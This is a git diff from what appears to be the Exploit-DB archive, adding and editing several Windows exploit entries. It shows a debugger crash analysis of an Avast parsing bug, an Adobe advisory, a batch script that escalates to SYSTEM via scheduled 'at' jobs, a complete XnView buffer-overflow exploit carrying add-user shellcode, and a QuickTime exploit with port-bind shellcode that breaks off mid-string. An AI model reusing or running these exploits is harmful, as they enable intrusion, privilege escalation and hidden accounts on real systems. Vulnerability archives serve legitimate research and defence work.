+8O6tk4BYAkBbaMhk8rPBZBKcny7hTUiCsfLr7PYby9O3hcLmGMajhhyYg+5jjw1x +XUQc6dsER9UAj7OukUHxqJH2trQvcQfCOQUx7iNgV4lHNfpOGDOBVvZYA/YNE6uF +mUuyoGDdHlE3jE9WVGamsy2t5lrY5HOYXK6ZJkAv79MkeM6Dzdt2VXdZmN4UHzec +NkAm0fvML143dcBt3BsuCsE5AhfBJGOesAUMkE7Z29HTux1fBrNyYs4KhzumSALy +2I7h4WTozJMXBufEZkvqcGA6ikWATr31SzaUGjzyko96whegkNizJhpFqbAwtlZZ +tz32tXjf97c+3mmpKvkHqsln2oPWJrfAEV2q96SlOuevFo38uJSYb31NNZrtfx7I +5FoXr8ZgR98VIxeQcceF021JvM95J0ciLWWLkRYoE3VP1pQz9frrX7QfUU5+QrqT +gCC49pWbeK00aVdlqgc3oquJd8kk4fVZ59HOaNJldQh2BM9isFscbQ8fDmYJna/K +0VzgaoItc0OBR4hLywPi2MEVvHQm3r7Qe4JGsnr1imRg7i84GfbsuYsG8UH/FkDP +4nWQnKcZFTrNzTNQdsvho/P6/d3Efp5zJr+GVkNwI4242yAYHaAfcfy+DzK7vDH+ +b3FqvVBebtLXMXwgRwx0 +=NlIz +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/windows/dos/39530.txt b/platforms/windows/dos/39530.txt new file mode 100755 index 000000000..697ced0c8 --- /dev/null +++ b/platforms/windows/dos/39530.txt @@ -0,0 +1,125 @@ +Source: https://code.google.com/p/google-security-research/issues/detail?id=668 + +The attached PE file causes memory corruption in Avast, it looks related to authenticode parsing. + + +(474.c0c): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000 +eip=740b4454 esp=10cedfa8 ebp=12555e70 iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +aswCmnBS_74080000!StreamHashClose+0x7dd4: +740b4454 8b06 mov eax,dword ptr [esi] ds:002b:30303030=???????? +0:080> ub +aswCmnBS_74080000!StreamHashClose+0x7dc5: +740b4445 55 push ebp +740b4446 56 push esi +740b4447 57 push edi +740b4448 33ff xor edi,edi +740b444a 8be9 mov ebp,ecx +740b444c 85db test ebx,ebx +740b444e 7447 je aswCmnBS_74080000!StreamHashClose+0x7e17 (740b4497) +740b4450 8b742418 mov esi,dword ptr [esp+18h] +0:080> dd esp+18 L1 +10cedfc0 30303030 + +# It looks like this address was a parameter, lets skip up a frame and see where it comes from +0:080> kvn 3 + # ChildEBP RetAddr Args to Child.............. + WARNING: Stack unwind information not available. Following frames may be wrong. + 00 10cedfb4 740b483e 30303030 30303030 a00be921 aswCmnBS_74080000!StreamHashClose+0x7dd4 + 01 10cedfe8 740c37e7 12481a88 00cf0400 00000008 aswCmnBS_74080000!StreamHashClose+0x81be + 02 10cee028 740aa2f5 12481a90 00001730 00030408 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7 + 0:080> .frame /c 1 + 01 10cedfe8 740c37e7 aswCmnBS_74080000!StreamHashClose+0x81be + eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000 + eip=740b483e esp=10cedfbc ebp=73e1dca8 iopl=0 nv up ei pl nz na pe nc + cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 + aswCmnBS_74080000!StreamHashClose+0x81be: + 740b483e 8bf8 mov edi,eax + 0:080> ub. + aswCmnBS_74080000!StreamHashClose+0x81aa: + 740b482a 0000 add byte ptr [eax],al + 740b482c 0001 add byte ptr [ecx],al + 740b482e 0000 add byte ptr [eax],al + 740b4830 00ff add bh,bh + 740b4832 7044 jo aswCmnBS_74080000!StreamHashClose+0x81f8 (740b4878) + 740b4834 8bce mov ecx,esi + 740b4836 ff7040 push dword ptr [eax+40h] + 740b4839 e802fcffff call aswCmnBS_74080000!StreamHashClose+0x7dc0 (740b4440) + +# The parameter comes from eax+40: + 0:080> dd eax+40 L1 + 128be3a4 30303030 + +# What is that address? + + 0:080> !address @eax + Mapping file section regions... + Mapping module regions... + Mapping PEB regions... + Mapping TEB and stack regions... + Mapping heap regions... + Mapping page heap regions... + Mapping other regions... + Mapping stack trace database regions... + Mapping activation context regions... + + + Usage: Heap + Base Address: 128b8000 + End Address: 128ea000 + Region Size: 00032000 + State: 00001000 MEM_COMMIT + Protect: 00000004 PAGE_READWRITE + Type: 00020000 MEM_PRIVATE + Allocation Base: 12150000 + Allocation Protect: 00000004 PAGE_READWRITE + More info: heap owning the address: !heap 0x120000 + More info: heap segment + More info: heap entry containing the address: !heap -x 0x128be364 + + +# It's a heap buffer, is it valid? + + 0:080> !heap -x 0x128be364 + Entry User Heap Segment Size PrevSize Unused Flags + ----------------------------------------------------------------------------- + 128bd038 128bd040 00120000 122ef5e0 1408 - 3f LFH;busy. + + +# Looks okay to me, where does that buffer come from? + +0:080> .frame /c 2 +02 10cee028 740aa2f5 aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7 +eax=128be364 ebx=30303030 ecx=12555e70 edx=128bd032 esi=30303030 edi=00000000 +eip=740c37e7 esp=10cedff0 ebp=128be364 iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xf7: +740c37e7 83c40c add esp,0Ch +0:080> ub +aswCmnBS_74080000!asw::root::CGenericFile::seekreadin+0xe3: +740c37d3 0000 add byte ptr [eax],al +740c37d5 0000 add byte ptr [eax],al +740c37d7 8b464c mov eax,dword ptr [esi+4Ch] +740c37da 57 push edi +740c37db 0345e8 add eax,dword ptr [ebp-18h] +740c37de 50 push eax +740c37df ff7510 push dword ptr [ebp+10h] +740c37e2 e88bc70000 call aswCmnBS_74080000!BZ2_bzerr+0x1d62 (740cff72) +0:080> dd ebp-18 L1 +128be34c 57d9ddea + +That is a really strange offset! And that DWORD appears in the input file at offset 316b3h: + +│000316a0 a8 65 18 e9 79 40 62 25-96 6e c7 c7 37 6a 83 21 |?e??y@b%?n??7j?!|... +│000316b0 08 8e 41 ea dd d9 57 3f-1d 77 49 87 2a 16 06 5e |??A???W??wI?*??^|... +│000316c0 a6 38 6a 22 12 a3 51 19-83 7e b6 00 00 31 82 04 |?8j"??Q??~? 1??|... + +This looks like broken authenticode parsing to me. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39530.zip + diff --git a/platforms/windows/dos/39533.txt b/platforms/windows/dos/39533.txt new file mode 100755 index 000000000..676af6000 --- /dev/null +++ b/platforms/windows/dos/39533.txt @@ -0,0 +1,51 @@ +######################################################################################## + +# Title: Adobe Digital Editions <= 4.5.0 - Critical memory corruption +# Application: Adobe Digital Editions +# Version: 4.5.0 and earlier versions +# Platform: Windows, Macintosh, iOS and Android +# Software Link: http://www.adobe.com/solutions/ebook/digital-editions.html +# Date: March 8, 2016 +# CVE: CVE-2016-0954 +# Author: Pier-Luc Maltais from COSIG +# Contact: https://twitter.com/COSIG_ +# Personal contact: https://twitter.com/plmaltais + +######################################################################################## + +=================== +Introduction: +=================== + Adobe® Digital Editions software offers an engaging way to view and manage eBooks and + other digital publications. Use it to download and purchase digital content, which can + be read both online and offline. Transfer copy-protected eBooks from your personal + computer to other computers or devices. Organize your eBooks into a custom library and + annotate pages. Digital Editions also supports industry-standard eBook formats, + including PDF/A and EPUB. (http://www.adobe.com/ca_fr/products/digital-editions.html) + +######################################################################################## + +=================== +Report Timeline: +=================== + 2015-10-24: Pier-Luc Maltais from COSIG found the issue and report it to Adobe PSIRT. + 2016-03-08: Vendor fixed the issue (APSB16-06). + 2016-03-08: Release of this advisory. + +######################################################################################## + +=================== +Technical details: +=================== + A critical memory corruption occurs when Adobe Digital Editions handle a specially + crafted ExtGstate object, which could lead to remote code execution. + +######################################################################################## + +========== +POC: +========== +https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39533.zip + +######################################################################################## \ No newline at end of file diff --git a/platforms/windows/local/11199.txt b/platforms/windows/local/11199.txt index 0a2b3bac9..e9dfbcc66 100755 --- a/platforms/windows/local/11199.txt +++ b/platforms/windows/local/11199.txt @@ -1,4 +1,7 @@ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip) +EDB Note: Make sure to run "vdmallowed.exe" (pre-compiled) inside the subfolder. + + Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack ------------------------------------------------------------------------- @@ -151,11 +154,11 @@ described above. .text:0043C426 retn 4 /* ... */ -Possibly naive example code for triggering this condition is availble from the +Possibly naive example code for triggering this condition is available from the link below. http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/KiTrap0D.zip +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip) The code has been tested on Windows XP, Windows Server 2003/2008, Windows Vista and Windows 7. Support for other affected operating systems is left as an diff --git a/platforms/windows/local/271.c b/platforms/windows/local/271.c index 317b16175..166ee82af 100755 --- a/platforms/windows/local/271.c +++ b/platforms/windows/local/271.c @@ -73,6 +73,6 @@ int main(int argc, char *argv[]) } - - -// milw0rm.com [2004-04-15] + + +// milw0rm.com [2004-04-15] diff --git a/platforms/windows/local/35850.bat b/platforms/windows/local/35850.bat index 6a130791d..8289f5d37 100755 --- a/platforms/windows/local/35850.bat +++ b/platforms/windows/local/35850.bat @@ -1,10 +1,14 @@ -source: http://www.securityfocus.com/bid/48232/info - -Microsoft Windows is prone to a local privilege-escalation vulnerability. - -A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition. - @echo off +REM +REM source: http://www.securityfocus.com/bid/48232/info +REM +REM Microsoft Windows is prone to a local privilege-escalation vulnerability. +REM +REM A local attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. +REM Successful exploits will result in the complete compromise of affected computers. +REM Failed exploit attempts may cause a denial-of-service condition. +REM + echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit start time /T > time.txt tskill explorer @@ -25,7 +29,6 @@ at 13:37 /interactive cmd.exe at 13:37 /interactive explorer.exe at 13:37 /interactive at /del /y - echo [*] Backup time time < time.txt diff --git a/platforms/windows/local/5951.c b/platforms/windows/local/5951.c index 536f57df1..1385a4983 100755 --- a/platforms/windows/local/5951.c +++ b/platforms/windows/local/5951.c @@ -1,83 +1,83 @@ -#include -#include -/* - XnView 1.93.6 for Windows .taac buffer overflow proof of concept. - -The vulnerability is caused due to a boundary error when processing -the "format" keyword of Sun TAAC files. This can be exploited to -cause a stack-based buffer overflow by e.g. tricking a user into -viewing a specially crafted Sun TAAC file. - -Vulnerability discoverd by Secunia research http://secunia.com/secunia_research/2008-24/advisory/ - -Exploit code by Shinnok raydenxy@yahoo.com -http://www.rstcenter.com - -This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows -will cause a buffer overflow and add an user "test" with password "test". -Tested on Windows XP sp2&sp3. - -greetz to escalation666 -/* - -/* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */ -unsigned char scode[] = -"\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf" -"\x93\x8f\x1e\x83\xeb\xfc\xe2\xf4\x43\x7b\xcb\x1e\xbf\x93\x04\x5b" -"\x83\x18\xf3\x1b\xc7\x92\x60\x95\xf0\x8b\x04\x41\x9f\x92\x64\x57" -"\x34\xa7\x04\x1f\x51\xa2\x4f\x87\x13\x17\x4f\x6a\xb8\x52\x45\x13" -"\xbe\x51\x64\xea\x84\xc7\xab\x1a\xca\x76\x04\x41\x9b\x92\x64\x78" -"\x34\x9f\xc4\x95\xe0\x8f\x8e\xf5\x34\x8f\x04\x1f\x54\x1a\xd3\x3a" -"\xbb\x50\xbe\xde\xdb\x18\xcf\x2e\x3a\x53\xf7\x12\x34\xd3\x83\x95" -"\xcf\x8f\x22\x95\xd7\x9b\x64\x17\x34\x13\x3f\x1e\xbf\x93\x04\x76" -"\x83\xcc\xbe\xe8\xdf\xc5\x06\xe6\x3c\x53\xf4\x4e\xd7\x63\x05\x1a" -"\xe0\xfb\x17\xe0\x35\x9d\xd8\xe1\x58\xf0\xe2\x7a\x91\xf6\xf7\x7b" -"\x9f\xbc\xec\x3e\xd1\xf6\xfb\x3e\xca\xe0\xea\x6c\x9f\xe7\xea\x6d" -"\xcb\xb3\xfb\x7b\xcc\xe7\xaf\x31\xfe\xd7\xcb\x3e\x99\xb5\xaf\x70" -"\xda\xe7\xaf\x72\xd0\xf0\xee\x72\xd8\xe1\xe0\x6b\xcf\xb3\xce\x7a" -"\xd2\xfa\xe1\x77\xcc\xe7\xfd\x7f\xcb\xfc\xfd\x6d\x9f\xe7\xea\x6d" -"\xcb\xb3\xa0\x5f\xfb\xd7\x8f\x1e"; - - -unsigned char ra_sp2[] = "\xed\x1e\x94\x7c"; -unsigned char ra_sp3[] = "\x83\xbf\x8a\x5b"; - -unsigned char nops1[257]; //256 * \x90 -unsigned char nops2[21]; //20 * \x90 - -int main(int argc, char **argv) -{ - int i; - FILE* f; - printf("[+] XnView 1.93.6 for Windows .taac buffer overflow\n"); - printf("[+] Discovered by Secunia : \nhttp://secunia.com/secunia_research/2008-24/advisory/\n"); - printf("[+] Coded by shinnok,greetz to escalation666.\n http://www.rstcenter.com \n"); - if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){ - printf("Usage: %s target\n",argv[0]); - printf("Where target is:\n"); - printf("0: WinXP SP2\n"); - printf("1: WinXP SP3\n"); - printf("Successfull exploitation will result in the adding of user \"test\" with password \"test\".\n"); - return EXIT_SUCCESS; - } - for(i=0;i<256;i++) nops1[i]='\x90'; - nops1[256]='\0'; - for(i=0;i<14;i++) nops2[i]='\x90'; - nops2[20]='\0'; - if(atoi(argv[1])==0) { - f=fopen("sploit.taac","wb"); - fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa'); - fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'\xa'); - }else{ - f=fopen("sploit.taac","wb"); - fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa'); - fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'\xa'); - } - fclose(f); - printf("sploit.taac created!\n"); - printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.\n"); - printf("Then check with \"net user\" or from control panel for the user account test.\n"); - return EXIT_SUCCESS; -} - -// milw0rm.com [2008-06-26] +#include +#include +/* + XnView 1.93.6 for Windows .taac buffer overflow proof of concept. + +The vulnerability is caused due to a boundary error when processing +the "format" keyword of Sun TAAC files. This can be exploited to +cause a stack-based buffer overflow by e.g. tricking a user into +viewing a specially crafted Sun TAAC file. + +Vulnerability discoverd by Secunia research http://secunia.com/secunia_research/2008-24/advisory/ + +Exploit code by Shinnok raydenxy@yahoo.com +http://www.rstcenter.com + +This poc will create a "special" .taac file that when opened or viewed in XnView 1.93.6 for Windows +will cause a buffer overflow and add an user "test" with password "test". +Tested on Windows XP sp2&sp3. + +greetz to escalation666 +/* + +/* win32_adduser - PASS=test EXITFUNC=seh USER=test Size=232 Encoder=PexFnstenvSub http://metasploit.com */ +unsigned char scode[] = +"\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbf" +"\x93\x8f\x1e\x83\xeb\xfc\xe2\xf4\x43\x7b\xcb\x1e\xbf\x93\x04\x5b" +"\x83\x18\xf3\x1b\xc7\x92\x60\x95\xf0\x8b\x04\x41\x9f\x92\x64\x57" +"\x34\xa7\x04\x1f\x51\xa2\x4f\x87\x13\x17\x4f\x6a\xb8\x52\x45\x13" +"\xbe\x51\x64\xea\x84\xc7\xab\x1a\xca\x76\x04\x41\x9b\x92\x64\x78" +"\x34\x9f\xc4\x95\xe0\x8f\x8e\xf5\x34\x8f\x04\x1f\x54\x1a\xd3\x3a" +"\xbb\x50\xbe\xde\xdb\x18\xcf\x2e\x3a\x53\xf7\x12\x34\xd3\x83\x95" +"\xcf\x8f\x22\x95\xd7\x9b\x64\x17\x34\x13\x3f\x1e\xbf\x93\x04\x76" +"\x83\xcc\xbe\xe8\xdf\xc5\x06\xe6\x3c\x53\xf4\x4e\xd7\x63\x05\x1a" +"\xe0\xfb\x17\xe0\x35\x9d\xd8\xe1\x58\xf0\xe2\x7a\x91\xf6\xf7\x7b" +"\x9f\xbc\xec\x3e\xd1\xf6\xfb\x3e\xca\xe0\xea\x6c\x9f\xe7\xea\x6d" +"\xcb\xb3\xfb\x7b\xcc\xe7\xaf\x31\xfe\xd7\xcb\x3e\x99\xb5\xaf\x70" +"\xda\xe7\xaf\x72\xd0\xf0\xee\x72\xd8\xe1\xe0\x6b\xcf\xb3\xce\x7a" +"\xd2\xfa\xe1\x77\xcc\xe7\xfd\x7f\xcb\xfc\xfd\x6d\x9f\xe7\xea\x6d" +"\xcb\xb3\xa0\x5f\xfb\xd7\x8f\x1e"; + + +unsigned char ra_sp2[] = "\xed\x1e\x94\x7c"; +unsigned char ra_sp3[] = "\x83\xbf\x8a\x5b"; + +unsigned char nops1[257]; //256 * \x90 +unsigned char nops2[21]; //20 * \x90 + +int main(int argc, char **argv) +{ + int i; + FILE* f; + printf("[+] XnView 1.93.6 for Windows .taac buffer overflow\n"); + printf("[+] Discovered by Secunia : \nhttp://secunia.com/secunia_research/2008-24/advisory/\n"); + printf("[+] Coded by shinnok,greetz to escalation666.\n http://www.rstcenter.com \n"); + if ((argc!=2)||((atoi(argv[1])!=0)&&(atoi(argv[1])!=1))){ + printf("Usage: %s target\n",argv[0]); + printf("Where target is:\n"); + printf("0: WinXP SP2\n"); + printf("1: WinXP SP3\n"); + printf("Successfull exploitation will result in the adding of user \"test\" with password \"test\".\n"); + return EXIT_SUCCESS; + } + for(i=0;i<256;i++) nops1[i]='\x90'; + nops1[256]='\0'; + for(i=0;i<14;i++) nops2[i]='\x90'; + nops2[20]='\0'; + if(atoi(argv[1])==0) { + f=fopen("sploit.taac","wb"); + fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa'); + fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp2,nops2,scode,'\xa'); + }else{ + f=fopen("sploit.taac","wb"); + fprintf(f,"ncaa%crank=2;%cbands=3;%csize=125 123;%c",'\xa','\xa','\xa','\xa'); + fprintf(f,"format=%s%s%s%s;%c",nops1,ra_sp3,nops2,scode,'\xa'); + } + fclose(f); + printf("sploit.taac created!\n"); + printf("Now open sploit.taac in XnView or browse from it to the folder containing sploit.taac.\n"); + printf("Then check with \"net user\" or from control panel for the user account test.\n"); + return EXIT_SUCCESS; +} + +// milw0rm.com [2008-06-26] diff --git a/platforms/windows/remote/3072.py b/platforms/windows/remote/3072.py index f091b3b2e..95b6c5f6a 100755 --- a/platforms/windows/remote/3072.py +++ b/platforms/windows/remote/3072.py @@ -1,97 +1,97 @@ -#!/usr/bin/python -#Port bind exploit for apple quicktime rtsp vulnerability -#Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy -#to port the exploit to others. All one needs to do is look for the appropriate -#jump address. Certain characters are not permitted in the shellcode. -#Alphanumeric shellcodes work fine. -#This script creates a qtl file which when clicked upon binds a shell to TCP -#port 4444. This file can be delivered through several means; HTTP, SMTP etc -# -# Winny Thomas ;-) -# Author shall bear no responsibility for any kind of screws up caused by using -# this code - -import sys - -#alpha numeric port bind shellcode from metasploit; binds shell to port 4444 -shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" -shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" -shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" -shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" -shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" -shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" -shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" -shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" -shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" -shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" -shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" -shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" -shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" -shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" -shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" -shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" -shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" -shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" -shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x43\x35\x43\x34" -shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x41" -shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x4a\x56\x46\x4a" -shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31" -shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" -shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d" -shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x4f\x4f\x48\x4d" -shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x56" -shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" -shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x4a\x46\x43\x46" -shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x52\x4e\x4c" -shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x41\x53\x42\x4c" -shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x34\x4e\x32" -shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" -shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x34\x4f\x4f" -shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x41\x55\x4c\x36" -shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" -shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x56" -shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" -shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" -shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x4f\x4f\x48\x4d" -shellcode += "\x4f\x4f\x42\x4d\x5a\x90" -shellcode += "\x90" * 90 - - -def CreateQTL(sp): - if sp == "1": - JMPedi = '\xf5\x0c\xe5\x77' #Address of jmp edi from user32.dll - elif sp == "2": - JMPedi = '\x34\xd9\xe4\x77' #Address of jmp edi from user32.dll - else: - print 'Unsupported Service pack number' - sys.exit(-1) - - #XML template from http://www.milw0rm.org/exploits/3064 - QTL = "" - QTL += "" - QTL += "\n" - - fd = open('./exp.qtl', 'w') - fd.write(QTL) - fd.close() - -if __name__ == '__main__': - try: - sp = sys.argv[1] - except IndexError: - print 'Usage: %s \n' % sys.argv[0] - print 'Version: 1 => windows 2000 server SP0' - print 'Version: 2 => windows 2000 server SP4' - sys.exit(-1) - - CreateQTL(sp) - -# milw0rm.com [2007-01-03] +#!/usr/bin/python +#Port bind exploit for apple quicktime rtsp vulnerability +#Tested on windows 2000 SP0 and SP4 with quicktime 7.1.3.100. Should be easy +#to port the exploit to others. All one needs to do is look for the appropriate +#jump address. Certain characters are not permitted in the shellcode. +#Alphanumeric shellcodes work fine. +#This script creates a qtl file which when clicked upon binds a shell to TCP +#port 4444. This file can be delivered through several means; HTTP, SMTP etc +# +# Winny Thomas ;-) +# Author shall bear no responsibility for any kind of screws up caused by using +# this code + +import sys + +#alpha numeric port bind shellcode from metasploit; binds shell to port 4444 +shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" +shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x58" +shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x4b\x48\x4e\x57" +shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x4a\x51\x4b\x38" +shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x58" +shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x45\x4e\x4b\x48" +shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x54" +shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58" +shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d" +shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x4e\x30\x4b\x38" +shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x56" +shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x36" +shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x47\x37\x43\x57" +shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e" +shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e" +shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x4c\x36\x44\x30" +shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x35" +shellcode += 